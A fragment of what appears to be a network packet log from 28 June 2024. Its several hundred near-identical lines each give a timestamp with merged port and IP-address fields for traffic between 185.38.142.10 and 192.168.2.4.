                      Jun 28, 2024 12:02:04.705424070 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705435038 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705449104 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705461025 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705472946 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705483913 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705496073 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705507040 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.705871105 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706027985 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706041098 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706053019 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706063986 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706077099 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706088066 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706099987 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706110954 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706134081 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706146002 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706168890 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706181049 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706192970 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706203938 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706216097 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706228018 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706238985 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706249952 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706262112 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706274033 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706285954 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706296921 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706309080 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706321001 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706331968 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706343889 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706355095 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706366062 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706377983 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706389904 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706402063 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706413031 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706434965 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706446886 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706459045 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706470013 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706481934 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706492901 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706504107 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706515074 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706537962 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706549883 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706563950 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706573963 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706584930 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706597090 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706609011 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706620932 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706644058 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706655979 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706666946 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706679106 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706691027 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706701994 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706713915 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706724882 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706736088 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706748009 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706758976 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706770897 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.706783056 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707259893 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707272053 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707287073 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707298040 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707309961 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707321882 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707334042 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707360029 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707371950 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707384109 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707396984 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707408905 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707421064 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707439899 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707451105 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707463026 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707473993 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707484961 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707495928 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707508087 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707519054 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707530022 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707540989 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707552910 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707564116 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707575083 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707586050 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707597971 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707609892 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707621098 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707633018 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707647085 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707664967 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707676888 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707688093 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707700014 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707711935 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707724094 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707735062 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707746029 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707757950 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707770109 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707782030 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707793951 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707806110 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707817078 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707828999 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707839966 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707884073 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707895994 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707907915 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707918882 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707937002 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707947969 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707959890 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707971096 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.707993984 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708009005 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708020926 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708031893 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708044052 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708055019 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708066940 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708077908 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708089113 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708101034 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708112001 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708125114 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708137035 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708148956 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708161116 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708172083 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708184004 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708194971 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708206892 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708219051 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708230972 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708241940 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708252907 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708264112 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708275080 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708296061 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708314896 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708327055 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708338976 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708349943 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708360910 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708373070 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708384037 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708395004 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708406925 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708419085 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708431959 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708444118 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708456039 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708467007 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708478928 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708514929 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708527088 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708538055 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708549976 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708560944 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708574057 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708585024 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708596945 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708609104 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708621979 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708646059 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708657980 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708669901 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708682060 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708693981 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708705902 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708717108 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708729982 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708741903 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708753109 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708764076 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708775997 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708786964 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708800077 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708812952 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708823919 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708836079 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708847046 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708858967 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708869934 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708882093 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708894014 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708904982 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708945036 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708959103 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708975077 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708986998 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.708998919 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709011078 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709022999 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709033966 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709045887 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709057093 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709068060 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709079981 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709091902 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709103107 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709115028 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709125996 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709136963 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709148884 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709160089 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709172010 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709183931 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709196091 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709207058 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709218979 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709228992 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709239960 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709260941 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709278107 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709290028 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709301949 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709314108 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709326029 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709337950 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709348917 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709361076 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709372044 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709384918 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709397078 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709408045 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709419966 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709431887 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709443092 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709454060 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709465981 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709476948 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709491014 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709502935 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709515095 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709527016 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709538937 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709551096 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709572077 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709589005 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709602118 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709614038 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709625006 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709636927 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709649086 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709661007 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709672928 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709683895 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709696054 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709707975 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709719896 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709732056 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709743977 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709755898 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709767103 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709779024 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709789991 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709800959 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709813118 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709824085 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709836006 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709847927 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709860086 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709887981 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709909916 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709922075 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709933996 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709944963 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709956884 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.709969044 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710026026 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710037947 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710050106 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710062027 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710073948 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710084915 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710097075 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710108995 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710122108 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710134029 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710146904 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710159063 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710170984 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710181952 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710207939 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710218906 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710231066 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710242033 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710253954 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710264921 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710277081 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710289001 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710299969 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710311890 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710323095 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710335016 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710346937 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710357904 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710370064 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710381031 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710392952 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710403919 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710416079 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710437059 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710448980 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710459948 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710470915 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710483074 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710494995 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710506916 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710519075 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710530043 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710551977 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710563898 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710576057 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710597992 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710611105 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710650921 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710664034 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710685015 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710697889 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710709095 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710721016 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710829020 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710841894 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710853100 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710865021 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710877895 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.710889101 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.711021900 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.711194038 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.711658955 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.711672068 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712008953 CEST747449733185.38.142.10192.168.2.4
                      Jun 28, 2024 12:02:04.712021112 CEST747449733185.38.142.10192.168.2.4
